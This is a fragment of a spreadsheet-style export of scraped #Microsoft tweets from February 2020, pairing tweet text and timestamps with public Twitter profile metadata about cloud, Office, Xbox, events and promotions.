    <t>{'id': 932076431772934144, 'id_str': '932076431772934144', 'name': 'CryptoSID', 'screen_name': 'CryptooSID', 'location': 'https://t.me/DappStats', 'description': 'Join us on the revolutionary DApp Analytic site which will change DApp Space for the better!!!', 'url': 'https://t.co/gwhQ9AiPvL', 'entities': {'url': {'urls': [{'url': 'https://t.co/gwhQ9AiPvL', 'expanded_url': 'http://www.DappStats.com', 'display_url': 'DappStats.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1734, 'friends_count': 436, 'listed_count': 8, 'created_at': 'Sun Nov 19 02:41:53 +0000 2017', 'favourites_count': 1366, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3821,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'http://pbs.twimg.com/profile_images/966744425929068545/N-0gxeUt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/966744425929068545/N-0gxeUt_normal.jpg',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</si>
  <si>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07:47:18 +0000 2020</t>
  </si>
  <si>
    <t>Azure Unblogged - Replace your file server with a serverless Azure file share! https://t.co/aPeRpzG2Pt #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 07:35:17 +0000 2020</t>
  </si>
  <si>
    <t>#Developers Need To Be #Responsible, Should Focus On #Trust, #Inclusivity  &amp;amp; #Sustainability says #Microsoft #CEO #SatyaNadella
https://t.co/Sl5HBSj9nN</t>
  </si>
  <si>
    <t>{'id': 1074624357652037632, 'id_str': '1074624357652037632', 'name': 'Caddycode', 'screen_name': 'Caddycode1', 'location': 'Chennai, India', 'description': 'CaddyCode Solutions can assist customers on their daily IT needs at affordable cost\n#SEO #DigitalMarketing #Agile #WebsiteDesigning #Umbraco #Dotnet', 'url': 'https://t.co/UvVgR8N8Rc', 'entities': {'url': {'urls': [{'url': 'https://t.co/UvVgR8N8Rc', 'expanded_url': 'http://www.caddycode.com', 'display_url': 'caddycode.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 29, 'friends_count': 147, 'listed_count': 0, 'created_at': 'Mon Dec 17 11:16:27 +0000 2018', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 235,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'http://pbs.twimg.com/profile_images/1093771844925063169/9mDjdJeW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1093771844925063169/9mDjdJeW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1074624357652037632/1577945560',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</si>
  <si>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07:35:01 +0000 2020</t>
  </si>
  <si>
    <t>Meet the new #Microsoft Edge: Your move, #Google https://t.co/ZQpHzr9tkY #TechJunkieNews https://t.co/qSGafOuejU</t>
  </si>
  <si>
    <t>Wed Feb 26 07:30:40 +0000 2020</t>
  </si>
  <si>
    <t>"Qt to support Visual Studio Linux projects" by #Microsoft https://t.co/ECiCdgVOSd #cpp</t>
  </si>
  <si>
    <t>{'id': 1020606333475835905, 'id_str': '1020606333475835905', 'name': 'Madrid C/C++ User Group', 'screen_name': 'madridccppug', 'location': 'Madrid, Comunidad de Madrid', 'description': 'Madrid C/C++ User Group. Ãšnete a nosotros para seguir la actualidad del C++ en #Madrid.', 'url': 'https://t.co/qBxGLR4Q4R', 'entities': {'url': {'urls': [{'url': 'https://t.co/qBxGLR4Q4R', 'expanded_url': 'https://madridccppug.github.io/meetups/', 'display_url': 'madridccppug.github.io/meetups/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 272, 'friends_count': 58, 'listed_count': 8, 'created_at': 'Sat Jul 21 09:48:06 +0000 2018', 'favourites_count': 54, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 410, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1020608966148218880/rLrXTkgZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1020608966148218880/rLrXTkgZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1020606333475835905/1551718863',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</si>
  <si>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07:27:27 +0000 2020</t>
  </si>
  <si>
    <t>Next up on Microsoft's dust heap: Office 2010
#MSOffice #Microsoft #Office365 https://t.co/7FyH1RgJVb</t>
  </si>
  <si>
    <t>{'id': 50307682, 'id_str': '50307682', 'name': 'Badr A. Abdalla ðŸ‡¦ðŸ‡ª', 'screen_name': 'BadrUAE', 'location': 'Sharjah - UAE', 'description': "â˜•ï¸ÙƒÙˆÙÙŠÙ†ÙŠØ³ØªØ§â˜•ï¸  ðŸ‘¨ðŸ»\u200dðŸŽ“Comp ScðŸ‘¨ðŸ»\u200dðŸŽ“  ðŸ‘¨ðŸ»\u200dðŸ’»IT Network EngðŸ‘¨ðŸ»\u200dðŸ’»  ðŸ›°Ex-Orbital Mechanics Eng.ðŸ›°  Juventus âš½ï¸ðŸ‡®ðŸ‡¹ is my 'Kryptonite'.  SCðŸ‘»: albadry197", 'url': 'https://t.co/SbhaqXuaUz', 'entities': {'url': {'urls': [{'url': 'https://t.co/SbhaqXuaUz', 'expanded_url': 'http://ae.linkedin.com/in/badrabdalla', 'display_url': 'ae.linkedin.com/in/badrabdalla', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 368, 'friends_count': 1137, 'listed_count': 19, 'created_at': 'Wed Jun 24 13:42:45 +0000 2009', 'favourites_count': 1118, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6920,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'http://pbs.twimg.com/profile_images/459419069771304960/baMMW3nl_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/459419069771304960/baMMW3nl_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/50307682/1479424091', 'profile_link_color': '990000', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F3F3F3', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 07:27:18 +0000 2020</t>
  </si>
  <si>
    <t>#brisbane  Lets discuss "Zero Trust Network Architecture".  Join me by registering here, very limited seats so act soon.  #cybersecurity #zerotrust #microsoft https://t.co/1zy1GZCJdV</t>
  </si>
  <si>
    <t>{'id': 104083928, 'id_str': '104083928', 'name': 'Abbas Kudrati', 'screen_name': 'askudrati', 'location': 'Melbourne (VIC) Australia', 'description': 'Cyber Security Advisor and Evangelist. Hobbyist Speaker &amp; Author. #View expressed are my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 459, 'friends_count': 258, 'listed_count': 14, 'created_at': 'Tue Jan 12 05:54:02 +0000 2010', 'favourites_count': 215, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2083,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'http://pbs.twimg.com/profile_images/1021318974296940544/YcaDsRIE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1021318974296940544/YcaDsRIE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/104083928/1467596363', 'profile_link_color': '1B95E0',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</si>
  <si>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Wed Feb 26 07:25:00 +0000 2020</t>
  </si>
  <si>
    <t>In few minutes Ammar Ahmad  will talk about #HPE solutions for #Microsoft #AzureStack portfolio: a complete set of integrated &amp;amp; certified solutions from #AzurestackHub to #AzurestackHCI 
Visit https://t.co/JuaCQWWvUF 
@Ghand_Mo @AljishiMaram #HPEMSFT @msdevSaudi @Othman_Albadr https://t.co/mhiTHlAOTp</t>
  </si>
  <si>
    <t>Wed Feb 26 07:21:12 +0000 2020</t>
  </si>
  <si>
    <t>We are going to organize a series of events after getting an overwhelming response in recent events. For more details visit our Facebook page.
#tmrc #glossophobia #event #session #series #joinus #growwithus #microsoft #pakistan #motivation #speaker https://t.co/YUOyQUGoNf</t>
  </si>
  <si>
    <t>Wed Feb 26 07:20:34 +0000 2020</t>
  </si>
  <si>
    <t>We're excited to welcome @PaulaCqure as a speaker at the #WPNinjaS. She is the #founder and #CEO of CQURE Inc. 
 #Switzerland #Microsoft #M365 #Microsoft365   #MicrosoftSecurity #WomaninTech #Speaker #ConfigMgr #MEMCM #MSIntune #ATP #PowerShell #TheCircle #Tech  #MEM https://t.co/Hzs7QMNzFa</t>
  </si>
  <si>
    <t>Wed Feb 26 07:17:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft to Office 365 ProPlus users: This new feature cuts malicious docs risks.
https://t.co/kRxum4zPTg
@ZDNet @Microsoft @Office365 
#microsoft #office365 #proplus #users #this #new #feature #malicious #docs #risks #previews #improve #experience #protect #view #malware https://t.co/5GXiatn01M</t>
  </si>
  <si>
    <t>Wed Feb 26 07:16:08 +0000 2020</t>
  </si>
  <si>
    <t>Go through an intense action story as Joanna and take out enemies in Perfect Dark Zero https://t.co/FsRerqYa3O #microsoft #xbox #xbox360 #gaming #darkness https://t.co/Krks2KTXRI</t>
  </si>
  <si>
    <t>Wed Feb 26 07:14:35 +0000 2020</t>
  </si>
  <si>
    <t>Indian Startup Innovation Can Have Global Relevance: Satya Nadella https://t.co/VcUcjXGfCP #news #microsoft</t>
  </si>
  <si>
    <t>{'id': 879630529011695618, 'id_str': '879630529011695618', 'name': 'Next Tech What', 'screen_name': 'NextTechWhat', 'location': 'Worldwide', 'description': 'Latest Tech News Tweets | #Startups #Tech #IoT #Automotive #HealthCare #Retail #Logistics #ArtificialIntelligence #BigData', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 223, 'friends_count': 140, 'listed_count': 7, 'created_at': 'Tue Jun 27 09:20:35 +0000 2017', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13623, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/881071189539471361/3C50ZYmt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/881071189539471361/3C50ZYmt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/879630529011695618/1498556276',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</si>
  <si>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07:14:26 +0000 2020</t>
  </si>
  <si>
    <t>Thanks for the info, #Microsoft!
Oddly enough, we didn't submit an application for this program ...  https://t.co/7x9DwghEWM</t>
  </si>
  <si>
    <t>Wed Feb 26 07:14:00 +0000 2020</t>
  </si>
  <si>
    <t>Total #IT #spending in #SaudiArabia forecast to hit $37Bn in 2020 according to @IDCMEA https://t.co/DAKa5mgFQb
Join industry experts today in Riyadh to discuss your #hybridcloud projects at the #HPE #Microsoft Summit @Ghand_Mo @AljishiMaram  @Othman_Albadr #HPEMSFT https://t.co/Yd6H3vbgTJ</t>
  </si>
  <si>
    <t>Wed Feb 26 07:11:11 +0000 2020</t>
  </si>
  <si>
    <t>"We're about empowering people in organizations all over the world to achieve more. In today's world, we want to use AI to achieve that," says Microsoft CEO Satya Nadella. Learn about the #Microsoft vision. https://t.co/LTOgbIbgS3</t>
  </si>
  <si>
    <t>Wed Feb 26 07:07:26 +0000 2020</t>
  </si>
  <si>
    <t>76% of businesses say IoT is critical to success. But integrating IoT isn't easy. Get the best help there is--get a #Microsoft partner. https://t.co/Gx1uFXK5Hr</t>
  </si>
  <si>
    <t>Wed Feb 26 07:07:00 +0000 2020</t>
  </si>
  <si>
    <t>HPE's Mark Evans runs through some of the key reasons to choose #AzureStack to power your #HybridCloud strategy. Watch in full: https://t.co/9ndgxK5WhE
#HPEAlliances #Microsoft #MSPartner #AzureStackHub https://t.co/uqQhW9CQUK</t>
  </si>
  <si>
    <t>Wed Feb 26 07:06:48 +0000 2020</t>
  </si>
  <si>
    <t>With no extended support for SQL Server 2008 and 2008 R2, it's time to modernize. Contact Tabarin Consulting to start your transformation journey with #SQLServer 2017, #Windows Server 2016 and #Microsoft #Azure. https://t.co/1C7meY3Olk</t>
  </si>
  <si>
    <t>Wed Feb 26 07:04:41 +0000 2020</t>
  </si>
  <si>
    <t>How a person can transform an organization #SatyaNadella #Microsoft #Leadership https://t.co/sl5ULkinyX</t>
  </si>
  <si>
    <t>{'id': 2587937647, 'id_str': '2587937647', 'name': 'Beatriz FlÃ³rez', 'screen_name': 'BFlorez_', 'location': 'LeÃ³n / Barcelona', 'description': 'Leaders leave a mark, prepare to leave yours. Passion for Corporate Transformation, People &amp; Agile Management.', 'url': 'https://t.co/bQcZyU8HPU', 'entities': {'url': {'urls': [{'url': 'https://t.co/bQcZyU8HPU', 'expanded_url': 'https://es.linkedin.com/in/beatrizflorez', 'display_url': 'es.linkedin.com/in/beatrizflorâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1154, 'friends_count': 1023, 'listed_count': 54, 'created_at': 'Wed Jun 25 17:38:40 +0000 2014', 'favourites_count': 3479, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2871,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'http://pbs.twimg.com/profile_images/1098675465512988674/cn8I-2ZG_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1098675465512988674/cn8I-2ZG_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2587937647/1550779654', 'profile_link_color': '981CEB',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</si>
  <si>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07:03:20 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Cloud and Datacenter Management Blog for the Community https://t.co/uVKU9GvDVj
#Azure #Winserv #Containers #AzOps #SecOps #MVPBuzz #DevOps #Developers #Cloud #AzureMonitor #ASC #Security #AzureStack #WAC and More....... https://t.co/heH49G1RJC</t>
  </si>
  <si>
    <t>Wed Feb 26 07:02:20 +0000 2020</t>
  </si>
  <si>
    <t>Schools don't always have the resources to dedicate to threat detection, but you can add a member to your team that can help. #Microsoft is using AI to scan, understand, and respond to threats as they evolve, so you don't have to. https://t.co/BNb9nXYAUo</t>
  </si>
  <si>
    <t>Wed Feb 26 07:01:33 +0000 2020</t>
  </si>
  <si>
    <t>Check out  @uCertify #Microsoft Windows 10 Course: https://t.co/AMDikyKK5f
#MCSA #Microsoft #Windows https://t.co/Ij0fyTYIx5</t>
  </si>
  <si>
    <t>Wed Feb 26 07:00:17 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 06:59:37 +0000 2020</t>
  </si>
  <si>
    <t>Wtf is up with #Xboxs dashboard after this update? Fucked that shit all up.
#Microsoft: "Oh you know where shit is, it's easy n quick, Let's just fuck that up for ya, shall we?"</t>
  </si>
  <si>
    <t>{'id': 121909475, 'id_str': '121909475', 'name': 'Brandon Bushey', 'screen_name': 'psyklo', 'location': "N.H.'s Asshole", 'description': '', 'url': 'https://t.co/OqKHAMRRJx', 'entities': {'url': {'urls': [{'url': 'https://t.co/OqKHAMRRJx', 'expanded_url': 'http://myspace.com/psyklo', 'display_url': 'myspace.com/psyklo', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 255, 'friends_count': 331, 'listed_count': 8, 'created_at': 'Thu Mar 11 00:40:32 +0000 2010', 'favourites_count': 143, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7339, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '050505', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1096599821799034882/nHWQXGN2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1096599821799034882/nHWQXGN2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/121909475/1544772129', 'profile_link_color': 'D60F0F', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'EFEFEF', 'profile_text_color': '8F1E8F', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 06:59:23 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's 100X100X100 Program For #B2B #SaaS #Startups In #India https://t.co/QouEkySCgf cc @Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 06:58:02 +0000 2020</t>
  </si>
  <si>
    <t>Making #SQLServer DBCC CHECKDB Run Faster
https://t.co/SvpyTeBn7N
#tsql #sqldba #microsoft #madeiradata https://t.co/TQyaMQKO12</t>
  </si>
  <si>
    <t>Wed Feb 26 06:58:00 +0000 2020</t>
  </si>
  <si>
    <t>Lee Cox, #Azure Global Blackbelt, introduces #AzureArc &amp;amp; talks about a couple of customer uses cases during #HPE #Microsoft #HybridCloud Summit 2020
#HPEMSFT #Social4UTV #Riyadh #HCI @AljishiMaram @Microsoft_Saudi @EssamSalah @Ghand_Mo @msdevSaudi @Othman_Albadr https://t.co/fsvQeZcblK</t>
  </si>
  <si>
    <t>Wed Feb 26 06:56:18 +0000 2020</t>
  </si>
  <si>
    <t>@Apple your iPhone 10 is a POS. Ive only had it for a year and its amazing how slow it became when the 11 magically appeared. I think its time for a change from your products that never last. 
#appleproducts #apple #iphone #iPhoneX #Microsoft</t>
  </si>
  <si>
    <t>{'id': 313254004, 'id_str': '313254004', 'name': 'David James', 'screen_name': 'Iam_davidjames', 'location': 'Seattle, L.A. Arizona ', 'description': 'Songwriter, JC, Learning Doctor', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 444, 'friends_count': 250, 'listed_count': 3, 'created_at': 'Wed Jun 08 11:24:00 +0000 2011', 'favourites_count': 1972, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3861,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'http://pbs.twimg.com/profile_images/1227260252472541185/Xbdadb7p_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227260252472541185/Xbdadb7p_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/313254004/1563720054',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</si>
  <si>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06:55:11 +0000 2020</t>
  </si>
  <si>
    <t>Just renewed my Microsoft Certified Trainer (MCT) status for another year... Yeah! #Microsoft #Trainer #MCT #LifeLongLearning #MCP https://t.co/nr5FIiXY3C</t>
  </si>
  <si>
    <t>Wed Feb 26 06:55:00 +0000 2020</t>
  </si>
  <si>
    <t>7 things #Microsoft didn't tell us about the new #Office app https://t.co/B3NVy8XDrn via @computerworld</t>
  </si>
  <si>
    <t>Wed Feb 26 06:50:46 +0000 2020</t>
  </si>
  <si>
    <t>WINDOWS TIP: It's Windows Wednesday! If you want to add 120 days onto February 13th then you might be tempted to try and use an Excel date calculation. But actually, the Windows Date Calculator can do that for you.
https://t.co/jrmXMEyRAI 
#cbtntrainer #microsoft #productivity https://t.co/PyJbIP7TyR</t>
  </si>
  <si>
    <t>Wed Feb 26 06:47:24 +0000 2020</t>
  </si>
  <si>
    <t>Sounds great Cormac L. - really looking forward to hearing and sharing all that you guys learned at Microsoft Ingite #microsoft #office365 #msignitethetour
https://t.co/34fgOwFy7n https://t.co/C94b6K60Gi</t>
  </si>
  <si>
    <t>{'id': 92061315, 'id_str': '92061315', 'name': 'Office Technology', 'screen_name': 'OfficeTechie', 'location': 'Ireland', 'description': 'Buy photocopiers and printers in Dublin - Canon printers, photocopiers and Canon copiers, document management software, it support and office furniture Ireland.', 'url': 'https://t.co/12jRPclrBP', 'entities': {'url': {'urls': [{'url': 'https://t.co/12jRPclrBP', 'expanded_url': 'https://www.officetechnology.ie', 'display_url': 'officetechnology.ie', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 121, 'friends_count': 21, 'listed_count': 6, 'created_at': 'Mon Nov 23 16:55:20 +0000 2009', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 586,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'http://pbs.twimg.com/profile_images/769812085/top-banner-1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/769812085/top-banner-1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/92061315/1507193051',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</si>
  <si>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06:47:23 +0000 2020</t>
  </si>
  <si>
    <t>@satyanadella , @MicrosoftCorps Chief Executive Officer (CEO) is expected to visit India on February 24, around the same time U.S. President Donald Trump will be visiting India
https://t.co/ahJV9ZHNuI
#CEO #visiting #Microsoft #DonaldTrumpIndiaVisit #DonaldTrump #CAA #immigrant https://t.co/AKxVNyDCsP</t>
  </si>
  <si>
    <t>{'id': 933205582751789056, 'id_str': '933205582751789056', 'name': 'SiliconIndia_US Edition', 'screen_name': 'SiliconindiaMag', 'location': 'Fort Lauderdale, FL', 'description': 'Siliconindia provides the most relevant and critical content for technology ecosystem by projecting stories of Top level management in India and U.S.', 'url': 'https://t.co/2sEPxRwLp9', 'entities': {'url': {'urls': [{'url': 'https://t.co/2sEPxRwLp9', 'expanded_url': 'http://www.siliconindia.com/', 'display_url': 'siliconindia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1068, 'friends_count': 1129, 'listed_count': 22, 'created_at': 'Wed Nov 22 05:28:43 +0000 2017', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1380, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/935855429367631873/hLWDCgnr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/935855429367631873/hLWDCgnr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/933205582751789056/1511960211',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</si>
  <si>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06:47:21 +0000 2020</t>
  </si>
  <si>
    <t>Sweeeeet, my SNES controller for Switch came in today!
#Nintendo #Sony #Microsoft https://t.co/UjNb3hCLxu</t>
  </si>
  <si>
    <t>{'id': 20099708, 'id_str': '20099708', 'name': 'JosÃ© DeJesus', 'screen_name': 'ninjacellprime', 'location': 'Chicago, IL', 'description': 'Gamer, jokester, music and movie lover.', 'url': 'https://t.co/o6pwbN6Fno', 'entities': {'url': {'urls': [{'url': 'https://t.co/o6pwbN6Fno', 'expanded_url': 'http://www.facebook.com/ninjacellprime', 'display_url': 'facebook.com/ninjacellprime', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 54, 'friends_count': 181, 'listed_count': 0, 'created_at': 'Wed Feb 04 22:04:04 +0000 2009', 'favourites_count': 5902, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4471,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'http://pbs.twimg.com/profile_images/1233167819967209476/DxJw-vJY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233167819967209476/DxJw-vJY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20099708/1577414335',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</si>
  <si>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Wed Feb 26 06:45:13 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Office365 in #education. We create the application for #MicrosoftTeams from #Excel https://t.co/0TC5IGRKQE #MVP #MIEExpert https://t.co/fbctLC0A66</t>
  </si>
  <si>
    <t>{'id': 84569615, 'id_str': '84569615', 'name': 'vitaly vedenev', 'screen_name': 'vedenev', 'location': 'Russia, Yaroslavl', 'description': 'Ph.D(chemistry). Microsoft #MVP 2015-2020. #Office365 in #Education. #eLearning. #Travel. #Photo. #Author. #MIEExpert', 'url': 'https://t.co/1xWs2eEI9D', 'entities': {'url': {'urls': [{'url': 'https://t.co/1xWs2eEI9D', 'expanded_url': 'http://facebook.com/vitaly.vedenev', 'display_url': 'facebook.com/vitaly.vedenev', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2881, 'friends_count': 2362, 'listed_count': 80, 'created_at': 'Fri Oct 23 11:48:48 +0000 2009', 'favourites_count': 123, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3436,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'http://pbs.twimg.com/profile_images/823149234077712384/IiFxLHoo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/823149234077712384/IiFxLHoo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/84569615/1381996605', 'profile_link_color': '93A644',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</si>
  <si>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Wed Feb 26 06:42:10 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Surface Pro 7 12 3 Intel Core i5 8GB RAM 128GB SSD + Type Cover #Microsoft #Surface https://t.co/MbfsCGCYvp Microsoft Surface Pro 7 12.3 Intel Core i5 8GB RAM 128GB SSD + Type Cover Price Total count 19119</t>
  </si>
  <si>
    <t>Wed Feb 26 06:38:16 +0000 2020</t>
  </si>
  <si>
    <t>My Channel
Guys, Subscribe to my channel!!!
https://t.co/jkyTf234IX
#youtube #YouTubeBlack #YouTubeLearning #Apple #Adobe #VIDEO #AppleCard #iphone9 #iPhoneSE2 #ConorMcGregor #Microsoft #FinalFantasyVII #GalaxyZFlip #PCOS #tutorial #tech #NewYork #California #channel #WWDC https://t.co/7yqL1BrUgv</t>
  </si>
  <si>
    <t>{'id': 3917167179, 'id_str': '3917167179', 'name': 'Stanislav Reus', 'screen_name': 'Tokin_Grain', 'location': 'California, USA', 'description': 'Chief', 'url': 'https://t.co/4pFPAyszSe', 'entities': {'url': {'urls': [{'url': 'https://t.co/4pFPAyszSe', 'expanded_url': 'http://apple.com', 'display_url': 'apple.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 43, 'friends_count': 144, 'listed_count': 1, 'created_at': 'Sat Oct 10 09:50:01 +0000 2015', 'favourites_count': 292, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 110,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'http://pbs.twimg.com/profile_images/1049310899197161472/Vtz4zkfA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1049310899197161472/Vtz4zkfA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3917167179/1562348834',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</si>
  <si>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06:37:54 +0000 2020</t>
  </si>
  <si>
    <t>Introduction to Power BI
#PowerBI #businessintelligence #Microsoft #LearningAndDevelopment #learningisfun #learningorganization #TrainingOfTheDay #data #Analytics #visualization 
Click on below link to get familiar with the word Power BI and stay tuned!
https://t.co/03fBOV1y8Z https://t.co/gI6ctjsl2o</t>
  </si>
  <si>
    <t>{'id': 1229818085734895616, 'id_str': '1229818085734895616', 'name': 'Pavan Lalwani', 'screen_name': 'Pavan55470690', 'location': '', 'description': 'Expertise in various business intelligence tools like Power BI, Tableau and Microsoft Excel with 10 years of experience.', 'url': 'https://t.co/k3NQdLeplm', 'entities': {'url': {'urls': [{'url': 'https://t.co/k3NQdLeplm', 'expanded_url': 'http://pavanlalwani.com/', 'display_url': 'pavanlalwani.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 8, 'listed_count': 0, 'created_at': 'Tue Feb 18 17:21:11 +0000 2020', 'favourites_count': 1,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'http://pbs.twimg.com/profile_images/1229818301171191809/B5qQ_eRf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229818301171191809/B5qQ_eRf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1229818085734895616/1582048841',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</si>
  <si>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06:37:09 +0000 2020</t>
  </si>
  <si>
    <t>Software is malleable, use it to create growth: Satya Nadella.... 
https://t.co/oXgQQaHmB2
#software #Microsoft @satyanadella @timesofindia #softwaredevelopment #tech #technews</t>
  </si>
  <si>
    <t>{'id': 1241053292, 'id_str': '1241053292', 'name': 'ConvergeSol', 'screen_name': 'ConvergeSol', 'location': 'New York, United States', 'description': 'We are Leading Custom Software Development &amp; Digital Solution Provider for Financial Companies and Small/Medium Size Businesses in The USA, UK, AU &amp; CAN .', 'url': 'https://t.co/pE92zXcHfJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/pE92zXcHfJ', 'expanded_url': 'https://www.convergesolution.com/', 'display_url': 'convergesolution.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 114, 'friends_count': 168, 'listed_count': 4, 'created_at': 'Mon Mar 04 10:34:56 +0000 2013', 'favourites_count': 1429, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1128, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F0F7FA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1227897008515510272/t1UTncje_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227897008515510272/t1UTncje_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1241053292/1579870198', 'profile_link_color': 'FF691F',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</si>
  <si>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Wed Feb 26 06:36:15 +0000 2020</t>
  </si>
  <si>
